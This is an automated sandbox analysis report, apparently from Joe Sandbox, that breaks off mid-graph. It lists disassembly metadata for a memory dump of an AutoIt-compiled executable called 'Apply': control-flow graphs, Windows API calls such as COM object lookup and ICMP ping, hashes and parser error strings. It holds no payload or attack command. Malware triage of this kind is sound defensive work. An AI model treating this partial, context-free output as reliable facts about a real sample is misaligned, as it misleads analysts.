                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                    • API String ID: 98802146-2727554177
                                                    • Opcode ID: c4be048c6927693107737e88f10b82d25757ce94c7e985625800163d54bef39a
                                                    • Instruction ID: 0aed9f82599a8d9d436af02d1cb32ab19f3525edf6ac5ba53fad79ab6503bc76
                                                    • Opcode Fuzzy Hash: c4be048c6927693107737e88f10b82d25757ce94c7e985625800163d54bef39a
                                                    • Instruction Fuzzy Hash: C67181715183019EC714EF69EC8189BBBE8FF95350F80892EF845C71A0EB749B49DB52

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSysColorBrush.USER32(0000000F), ref: 00852876
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00852885
                                                    • LoadIconW.USER32(00000063), ref: 0085289B
                                                    • LoadIconW.USER32(000000A4), ref: 008528AD
                                                    • LoadIconW.USER32(000000A2), ref: 008528BF
                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008528D7
                                                    • RegisterClassExW.USER32(?), ref: 00852928
                                                      • Part of subcall function 008529BC: GetSysColorBrush.USER32(0000000F), ref: 008529EF
                                                      • Part of subcall function 008529BC: RegisterClassExW.USER32(00000030), ref: 00852A19
                                                      • Part of subcall function 008529BC: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00852A2A
                                                      • Part of subcall function 008529BC: InitCommonControlsEx.COMCTL32(?), ref: 00852A47
                                                      • Part of subcall function 008529BC: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00852A57
                                                      • Part of subcall function 008529BC: LoadIconW.USER32(000000A9), ref: 00852A6D
                                                      • Part of subcall function 008529BC: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00852A7C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                    • String ID: #$0$AutoIt v3
                                                    • API String ID: 423443420-4155596026
                                                    • Opcode ID: 34e08914b9ae0a662e67e0c86136ba6d5b629f045cf4d8ec3308942e95d07106
                                                    • Instruction ID: 68c0d75def0c95527871b77f4093f620b8eef3446cf85d523e7747bff04f3bab
                                                    • Opcode Fuzzy Hash: 34e08914b9ae0a662e67e0c86136ba6d5b629f045cf4d8ec3308942e95d07106
                                                    • Instruction Fuzzy Hash: 0B21EA71D24354BFDB20EFA5EC45A997FB4FB48F50F00402AE604A62A0D7B95549EF90

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 559 8d43b7-8d4419 VariantInit call 855a63 CoInitialize 562 8d441b CoUninitialize 559->562 563 8d4421-8d4432 call 86b46f 559->563 562->563 566 8d443d-8d4441 563->566 567 8d4434-8d443a call 855a63 563->567 569 8d4480-8d44bc call 857e30 call 874cb3 566->569 570 8d4443-8d446a call 857e30 call 8b0695 566->570 567->566 581 8d465a-8d469d SetErrorMode CoGetInstanceFromFile 569->581 582 8d44c2-8d44c4 569->582 570->569 580 8d446c-8d447b call 8d4f5b 570->580 595 8d475a-8d476d VariantClear 580->595 584 8d469f-8d46a3 581->584 585 8d46a5-8d46bc CoGetObject 581->585 586 8d44c6 582->586 587 8d44e0 582->587 590 8d46c2-8d46cd SetErrorMode 584->590 591 8d46be 585->591 592 8d473b-8d474b call 8d4f5b SetErrorMode 585->592 593 8d44ca-8d44d3 586->593 588 8d44e2-8d44e4 587->588 588->581 594 8d44ea-8d44f6 588->594 597 8d46d1-8d46d7 590->597 591->590 606 8d4751-8d4755 call 85ac28 592->606 598 8d44d5-8d44de 593->598 599 8d4526-8d452c 593->599 600 8d44f8-8d450a call 86b46f 594->600 601 8d4532-8d4540 GetRunningObjectTable 594->601 603 8d472e-8d4731 597->603 604 8d46d9-8d46db 597->604 598->587 598->593 599->588 618 8d450c-8d4513 call 85b81d 600->618 619 8d452e 600->619 609 8d455f-8d4572 call 8d4f5b 601->609 610 8d4542-8d4553 601->610 603->592 607 8d46dd-8d46fe call 8b0abd 604->607 608 8d4713-8d472c call 8c13c8 604->608 606->595 607->608 622 8d4700-8d4709 607->622 608->606 609->606 623 8d4555-8d455a 610->623 624 8d4577-8d4586 610->624 618->619 629 8d4515-8d4524 call 85b81d 618->629 619->601 622->608 623->609 628 8d458d-8d45a0 624->628 633 8d45a6-8d45aa 628->633 634 8d4642-8d4658 628->634 629->601 633->634 635 8d45b0-8d45c5 633->635 634->597 638 8d4629-8d4633 635->638 639 8d45c7-8d45dc 635->639 638->628 639->638 643 8d45de-8d460a call 8b0abd 639->643 647 8d460c-8d4614 643->647 648 8d461b-8d4625 643->648 649 8d4638-8d463d 647->649 650 8d4616-8d4617 647->650 648->638 649->634 650->648
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 008D43E3
                                                    • CoInitialize.OLE32(00000000), ref: 008D4411
                                                    • CoUninitialize.OLE32 ref: 008D441B
                                                    • _wcslen.LIBCMT ref: 008D44B4
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 008D4538
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 008D465C
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 008D4695
                                                    • CoGetObject.OLE32(?,00000000,008F0B80,?), ref: 008D46B4
                                                    • SetErrorMode.KERNEL32(00000000), ref: 008D46C7
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 008D474B
                                                    • VariantClear.OLEAUT32(?), ref: 008D475F
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                    • String ID:
                                                    • API String ID: 429561992-0
                                                    • Opcode ID: f9185015315073b019cc4f76b6994e8e00ca5517bbc3f7c59220ce65b896cf08
                                                    • Instruction ID: 87a09e699119f9c70eabe1b583cbce98006bc50547d84abe36f1c94cad123d47
                                                    • Opcode Fuzzy Hash: f9185015315073b019cc4f76b6994e8e00ca5517bbc3f7c59220ce65b896cf08
                                                    • Instruction Fuzzy Hash: 98C13271608305AF9700DF68D88492BB7E9FF89748F145A1EF98ACB250DB30ED45CB52

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 652 85326c-85328f 653 853295-8532fe call 87015b call 856903 call 85ae03 call 856903 * 2 call 855e02 652->653 654 8933b5-8933c8 call 8b9f4f 652->654 688 853304-853311 call 855c7b call 855abf 653->688 689 8937e7-8937f7 call 8b9f4f 653->689 661 8933cf-8933d7 654->661 662 8933d9-8933e1 661->662 663 8933e7-8933ef 661->663 662->663 665 85332d-85339c call 85ae03 call 85321c call 85ae03 call 853ff7 call 85324f call 855ba7 662->665 666 8933fa-893402 663->666 667 8933f1-8933f8 663->667 703 8533a2-853411 call 85ae03 * 2 call 853e34 call 856aa4 SetCurrentDirectoryW call 85ac28 * 2 call 87015b call 853966 665->703 704 893430-89343b 665->704 671 89340d-893415 666->671 672 893404-89340b 666->672 670 893422-89342b call 8bd2e4 667->670 670->665 671->665 675 89341b-89341d 671->675 672->670 675->670 699 853316-853327 call 855aa8 688->699 695 8937fc 689->695 695->695 699->661 699->665 748 853415-85341a 703->748 704->703 706 893441-893474 call 856903 call 8554de 704->706 715 89347a-8934a1 call 8c33e2 call 85554c 706->715 716 89377e-893795 call 8b9f4f 706->716 715->716 730 8934a7-893523 call 87012b call 85ab1f call 85aa39 715->730 724 853561-8535ac call 85ac28 * 2 call 856903 call 85ac28 call 856903 call 870164 716->724 754 893529-89354b call 85ab1f 730->754 755 8936eb-893727 call 85ab1f call 8c11b5 call 8b4868 call 874cce 730->755 751 853420-85342d call 859d04 748->751 752 85352d-85354e call 856903 SetCurrentDirectoryW 748->752 751->752 766 853433-85344f call 853853 call 8537b3 751->766 752->724 767 853550-85355e call 87011d call 870164 752->767 770 89354d-89355c 754->770 771 893561-89356c call 8c12bb 754->771 799 893729-89374e call 854d00 call 870164 call 8c119d 755->799 796 853455-85346c call 853778 call 874cb3 766->796 797 8937ca-8937e2 call 8b9f4f 766->797 767->724 772 89367d-893690 call 85aa39 770->772 782 893589-893594 call 8c12a7 771->782 783 89356e-893584 771->783 772->754 792 893696-8936a0 772->792 802 8935aa-8935b5 call 86e546 782->802 803 893596-8935a5 782->803 783->772 793 8936d3 call 8ba2ab 792->793 794 8936a2-8936b0 792->794 808 8936d8-8936e5 793->808 794->793 800 8936b2-8936d1 call 8538a0 794->800 821 85346e-853485 call 876715 796->821 822 85348b-853490 796->822 797->752 799->724 800->808 802->772 817 8935bb-8935d7 call 8b9d32 802->817 803->772 808->754 808->755 832 8935d9-893604 call 85a1d4 call 85ac28 817->832 833 893606-893609 817->833 821->822 834 8535af-8535b9 821->834 823 8937ab-8937b3 call 8b9bfa 822->823 824 853496-8534b8 call 85a1d4 call 8535d5 822->824 847 8937b8-8937bb 823->847 848 8534bd-8534cf 824->848 876 893632-893643 call 85ab1f 832->876 837 89360b-893631 call 85a1d4 call 856cd7 call 85ac28 833->837 838 893645-893648 833->838 834->822 845 8535bf-8937a6 834->845 837->876 841 893669-89366d call 8c1243 838->841 842 89364a-893653 call 8b9c61 838->842 858 893672-89367c call 870164 841->858 861 893659-893664 call 870164 842->861 862 893753-89377c call 8b9f4f call 870164 call 874cce 842->862 845->822 854 8937c1-8937c5 847->854 855 8535c8-8535d0 847->855 856 8534d1-8534e8 call 870164 call 87011d 848->856 857 8534ec-8534ee 848->857 854->855 866 85351a-853527 855->866 856->857 867 8535c4 857->867 868 8534f4-8534f7 857->868 858->772 861->754 862->799 866->748 866->752 867->855 868->855 875 8534fd-853500 868->875 875->847 881 853506-853515 call 8538a0 875->881 876->858 881->866
                                                    APIs
                                                      • Part of subcall function 00856903: FindCloseChangeNotification.KERNEL32(?,?,?,008532C7), ref: 00856923
                                                      • Part of subcall function 00855E02: CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,008532FC,?,00008000), ref: 00855E30
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 008533E0
                                                    • _wcslen.LIBCMT ref: 0085345F
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0085353D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$ChangeCloseCreateFileFindNotification_wcslen
                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                    • API String ID: 2701412040-3738523708
                                                    • Opcode ID: 982aee14cc85a3e0db5c16514a809a41fbc2ac7bd1d71604f1189e802c6e439f
                                                    • Instruction ID: 98b3b8bb25c85b6c0fc8440f12b32a2a7015a179a2287e9040b4ecf92dce9e97
                                                    • Opcode Fuzzy Hash: 982aee14cc85a3e0db5c16514a809a41fbc2ac7bd1d71604f1189e802c6e439f
                                                    • Instruction Fuzzy Hash: AD1289705083459BCB15EF28C881AAEBBE4FF95355F44491EF88AD32A1DB30DA49CB53

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 890 8d0ce2-8d0d19 call 85d530 893 8d0d39-8d0d4b WSAStartup 890->893 894 8d0d1b-8d0d28 call 85b81d 890->894 896 8d0d4d-8d0d5b 893->896 897 8d0d7e-8d0dbb call 86c0af call 857e30 call 86fac6 inet_addr gethostbyname 893->897 894->893 905 8d0d2a-8d0d35 call 85b81d 894->905 900 8d0d5d 896->900 901 8d0d60-8d0d70 896->901 913 8d0dbd-8d0dca IcmpCreateFile 897->913 914 8d0dcc-8d0dda 897->914 900->901 902 8d0d75-8d0d79 901->902 903 8d0d72 901->903 906 8d0f73-8d0f7b 902->906 903->902 905->893 913->914 915 8d0dfd-8d0e2a call 87015b call 853966 913->915 916 8d0ddc 914->916 917 8d0ddf-8d0def 914->917 926 8d0e2c-8d0e53 IcmpSendEcho 915->926 927 8d0e55-8d0e72 IcmpSendEcho 915->927 916->917 919 8d0df4-8d0df8 917->919 920 8d0df1 917->920 922 8d0f6a-8d0f6e call 85ac28 919->922 920->919 922->906 928 8d0e76-8d0e78 926->928 927->928 929 8d0ed8-8d0ee6 928->929 930 8d0e7a-8d0e7f 928->930 931 8d0ee8 929->931 932 8d0eeb-8d0ef2 929->932 933 8d0e85-8d0e8a 930->933 934 8d0f22-8d0f34 call 85d530 930->934 931->932 935 8d0f0e-8d0f17 932->935 936 8d0e8c-8d0e91 933->936 937 8d0ef4-8d0f02 933->937 948 8d0f3a 934->948 949 8d0f36-8d0f38 934->949 941 8d0f1c-8d0f20 935->941 942 8d0f19 935->942 936->929 943 8d0e93-8d0e98 936->943 939 8d0f04 937->939 940 8d0f07 937->940 939->940 940->935 945 8d0f3c-8d0f53 IcmpCloseHandle WSACleanup 941->945 942->941 946 8d0ebd-8d0ecb 943->946 947 8d0e9a-8d0e9f 943->947 945->922 952 8d0f55-8d0f67 call 87011d call 870164 945->952 950 8d0ecd 946->950 951 8d0ed0-8d0ed6 946->951 947->937 953 8d0ea1-8d0eaf 947->953 948->945 949->945 950->951 951->935 952->922 955 8d0eb4-8d0ebb 953->955 956 8d0eb1 953->956 955->935 956->955
                                                    APIs
                                                    • WSAStartup.WS2_32(00000101,?), ref: 008D0D43
                                                    • inet_addr.WSOCK32(?), ref: 008D0DA3
                                                    • gethostbyname.WS2_32(?), ref: 008D0DAF
                                                    • IcmpCreateFile.IPHLPAPI ref: 008D0DBD
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 008D0E4D
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 008D0E6C
                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 008D0F40
                                                    • WSACleanup.WSOCK32 ref: 008D0F46
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: 3cacb4db8d728183659d870f0150ba1c7a3ae457904981b05ba63b653059d26b
                                                    • Instruction ID: bafb8f7f7121c9bb670dea717f844a3bdebbc618c6c8a23976a31ddad262b516
                                                    • Opcode Fuzzy Hash: 3cacb4db8d728183659d870f0150ba1c7a3ae457904981b05ba63b653059d26b
                                                    • Instruction Fuzzy Hash: B0914A716082419FD720DF19C489B16BBE1FF44358F148AAAE469CB7A2CB30ED45CF92

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 960 852f92-852fa7 961 853007-853009 960->961 962 852fa9-852fac 960->962 961->962 963 85300b 961->963 964 85300d 962->964 965 852fae-852fb5 962->965 966 852ff2-852ffa DefWindowProcW 963->966 967 853013-853018 964->967 968 893084-8930ac call 854286 call 86f09a 964->968 969 853087-85308f PostQuitMessage 965->969 970 852fbb-852fc0 965->970 976 853000-853006 966->976 971 85303f-853066 SetTimer RegisterWindowMessageW 967->971 972 85301a-85301d 967->972 1006 8930b1-8930b8 968->1006 977 85303b-85303d 969->977 973 852fc6-852fca 970->973 974 8930f1-893105 call 8bc631 970->974 971->977 980 853068-853073 CreatePopupMenu 971->980 978 853023-853036 KillTimer call 852f14 call 8547a8 972->978 979 893025-893028 972->979 981 853091-85309b call 86fc73 973->981 982 852fd0-852fd5 973->982 974->977 1000 89310b 974->1000 977->976 978->977 986 89302a-89302e 979->986 987 893060-89307f MoveWindow 979->987 980->977 993 8530a0 981->993 989 852fdb-852fe0 982->989 990 8930d6-8930dd 982->990 994 89304f-89305b SetFocus 986->994 995 893030-893033 986->995 987->977 998 853075-853085 call 8530a2 989->998 999 852fe6-852fec 989->999 990->966 997 8930e3-8930ec call 8b11b9 990->997 993->977 994->977 995->999 1002 893039-89304a call 854286 995->1002 997->966 998->977 999->966 999->1006 1000->966 1002->977 1006->966 1007 8930be-8930d1 call 852f14 call 853989 1006->1007 1007->966
                                                    APIs
                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00852F8C,?,?), ref: 00852FFA
                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00852F8C,?,?), ref: 00853026
                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00853049
                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00852F8C,?,?), ref: 00853054
                                                    • CreatePopupMenu.USER32 ref: 00853068
                                                    • PostQuitMessage.USER32(00000000), ref: 00853089
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                    • String ID: TaskbarCreated
                                                    • API String ID: 129472671-2362178303
                                                    • Opcode ID: c670b56311836863c61585cd1f8c1a7119e625162d1f5a0be32b54c2e705d2e9
                                                    • Instruction ID: d9370457407a799fc5e2f6e49e42f0fc92efc9ae8f6b95661cbea91dc0c03438
                                                    • Opcode Fuzzy Hash: c670b56311836863c61585cd1f8c1a7119e625162d1f5a0be32b54c2e705d2e9
                                                    • Instruction Fuzzy Hash: 7C412530218798BBDF38AB38AC49B793A64F74538AF040125FD02CA1E1DF758A4DA312

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1016 889095-8890a5 1017 8890bf-8890c1 1016->1017 1018 8890a7-8890ba call 882b55 call 882b68 1016->1018 1020 889429-889436 call 882b55 call 882b68 1017->1020 1021 8890c7-8890cd 1017->1021 1035 889441 1018->1035 1040 88943c call 882aac 1020->1040 1021->1020 1024 8890d3-8890fe 1021->1024 1024->1020 1025 889104-88910d 1024->1025 1028 88910f-889122 call 882b55 call 882b68 1025->1028 1029 889127-889129 1025->1029 1028->1040 1033 88912f-889133 1029->1033 1034 889425-889427 1029->1034 1033->1034 1039 889139-88913d 1033->1039 1037 889444-889449 1034->1037 1035->1037 1039->1028 1043 88913f-889156 1039->1043 1040->1035 1045 889158-88915b 1043->1045 1046 889173-88917c 1043->1046 1047 88915d-889163 1045->1047 1048 889165-88916e 1045->1048 1049 88919a-8891a4 1046->1049 1050 88917e-889195 call 882b55 call 882b68 call 882aac 1046->1050 1047->1048 1047->1050 1053 88920f-889229 1048->1053 1051 8891ab-8891c9 call 883b70 call 882d18 * 2 1049->1051 1052 8891a6-8891a8 1049->1052 1079 88935c 1050->1079 1089 8891cb-8891e1 call 882b68 call 882b55 1051->1089 1090 8891e6-88920c call 889774 1051->1090 1052->1051 1056 8892fd-889306 call 88fbee 1053->1056 1057 88922f-88923f 1053->1057 1068 889308-88931a 1056->1068 1069 889379 1056->1069 1057->1056 1061 889245-889247 1057->1061 1061->1056 1065 88924d-889273 1061->1065 1065->1056 1070 889279-88928c 1065->1070 1068->1069 1074 88931c-88932b GetConsoleMode 1068->1074 1072 88937d-889395 ReadFile 1069->1072 1070->1056 1075 88928e-889290 1070->1075 1077 8893f1-8893fc GetLastError 1072->1077 1078 889397-88939d 1072->1078 1074->1069 1080 88932d-889331 1074->1080 1075->1056 1081 889292-8892bd 1075->1081 1083 8893fe-889410 call 882b68 call 882b55 1077->1083 1084 889415-889418 1077->1084 1078->1077 1085 88939f 1078->1085 1087 88935f-889369 call 882d18 1079->1087 1080->1072 1086 889333-88934d ReadConsoleW 1080->1086 1081->1056 1088 8892bf-8892d2 1081->1088 1083->1079 1096 88941e-889420 1084->1096 1097 889355-88935b call 882b32 1084->1097 1092 8893a2-8893b4 1085->1092 1094 88936e-889377 1086->1094 1095 88934f GetLastError 1086->1095 1087->1037 1088->1056 1099 8892d4-8892d6 1088->1099 1089->1079 1090->1053 1092->1087 1103 8893b6-8893ba 1092->1103 1094->1092 1095->1097 1096->1087 1097->1079 1099->1056 1107 8892d8-8892f8 1099->1107 1110 8893bc-8893cc call 888db1 1103->1110 1111 8893d3-8893de 1103->1111 1107->1056 1122 8893cf-8893d1 1110->1122 1116 8893ea-8893ef call 888bf1 1111->1116 1117 8893e0 call 888f01 1111->1117 1123 8893e5-8893e8 1116->1123 1117->1123 1122->1087 1123->1122
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2540182096.0000000000851000.00000020.00000001.01000000.00000005.sdmp, Offset: 00850000, based on PE: true
                                                    • Associated: 0000000C.00000002.2540162349.0000000000850000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.00000000008ED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540236136.0000000000913000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540281660.000000000091D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 0000000C.00000002.2540300612.0000000000925000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_850000_Apply.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf15fa3dca3951b162da0c344f818af41284ee94d5d0b6e024966ca62660fdbd
                                                    • Instruction ID: 69e15fda347f3300f9ab48a3639a1dac630fced3158baa6b44d7e7e55bbcd898
                                                    • Opcode Fuzzy Hash: bf15fa3dca3951b162da0c344f818af41284ee94d5d0b6e024966ca62660fdbd
                                                    • Instruction Fuzzy Hash: 02C1AE74A04249AFDB11EFACC885BBDBBB4FF19310F184199E494EB392C7349942CB61

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1124 86aaf7-86af1c call 857e30 call 86bb11 call 85d530 1131 86af22-86af2c 1124->1131 1132 8a8446-8a8453 1124->1132 1133 86af32-86af37 1131->1133 1134 8a882d-8a883b 1131->1134 1135 8a8458-8a8467 1132->1135 1136 8a8455 1132->1136 1141 86af3d-86af49 call 86b46f 1133->1141 1142 8a8474-8a8476 1133->1142 1139 8a883d 1134->1139 1140 8a8840 1134->1140 1137 8a8469 1135->1137 1138 8a846c 1135->1138 1136->1135 1137->1138 1138->1142 1139->1140 1143 8a8847-8a8850 1140->1143 1147 8a847f 1141->1147 1149 86af4f-86af5c call 85b81d 1141->1149 1142->1147 1145 8a8852 1143->1145 1146 8a8855 1143->1146 1145->1146 1151 8a885e-8a88ad call 85d530 call 86ba77 * 2 1146->1151 1150 8a8489 1147->1150 1157 86af64-86af6d 1149->1157 1155 8a8491-8a8494 1150->1155 1185 86b099-86b0ae 1151->1185 1192 8a88b3-8a88c5 call 86b46f 1151->1192 1159 8a849a-8a84c2 call 874cb3 call 8569c4 1155->1159 1160 86b011-86b028 1155->1160 1158 86af71-86af8f call 874d78 1157->1158 1177 86af91-86af9a 1158->1177 1178 86af9e 1158->1178 1203 8a84ef-8a8513 call 856a09 call 85ac28 1159->1203 1204 8a84c4-8a84c8 1159->1204 1165 86b02e 1160->1165 1166 8a8816-8a8819 1160->1166 1170 86b034-86b037 1165->1170 1171 8a87c1-8a87e2 call 85d530 1165->1171 1172 8a881f-8a8822 1166->1172 1173 8a8903-8a893b call 85d530 call 86ba77 1166->1173 1174 8a85eb-8a8605 call 86ba77 1170->1174 1175 86b03d-86b040 1170->1175 1171->1185 1196 8a87e8-8a87fa call 86b46f 1171->1196 1172->1151 1176 8a8824-8a8827 1172->1176 1173->1185 1228 8a8941-8a8953 call 86b46f 1173->1228 1214 8a860b-8a860e 1174->1214 1215 8a8751-8a8777 call 85d530 1174->1215 1183 86b046-86b049 1175->1183 1184 8a858c-8a85a2 call 855a63 1175->1184 1176->1134 1176->1185 1177->1158 1186 86af9c 1177->1186 1178->1150 1188 86afa4-86afb5 1178->1188 1194 8a8518-8a851b 1183->1194 1195 86b04f-86b071 call 85d530 1183->1195 1184->1185 1231 8a85a8-8a85be call 86b46f 1184->1231 1198 8a898b-8a8991 1185->1198 1199 86b0b4-86b0c4 call 85d530 1185->1199 1186->1188 1188->1134 1197 86afbb-86afd5 1188->1197 1219 8a88f1-8a88fe call 85b81d 1192->1219 1220 8a88c7-8a88cf 1192->1220 1194->1134 1211 8a8521-8a8536 call 855a63 1194->1211 1195->1185 1235 86b073-86b085 call 86b46f 1195->1235 1238 8a87fc-8a8805 call 85b81d 1196->1238 1239 8a8807 1196->1239 1197->1155 1210 86afdb-86b00d call 86ba77 call 85d530 1197->1210 1198->1157 1216 8a8997 1198->1216 1203->1194 1204->1203 1205 8a84ca-8a84ed call 859c50 1204->1205 1205->1203 1205->1204 1210->1160 1211->1185 1258 8a853c-8a8552 call 86b46f 1211->1258 1226 8a8610-8a8613 1214->1226 1227 8a8681-8a86a0 call 85d530 1214->1227 1215->1185 1261 8a877d-8a878f call 86b46f 1215->1261 1216->1134 1272 8a8984-8a8986 1219->1272 1233 8a88e0-8a88eb call 85a344 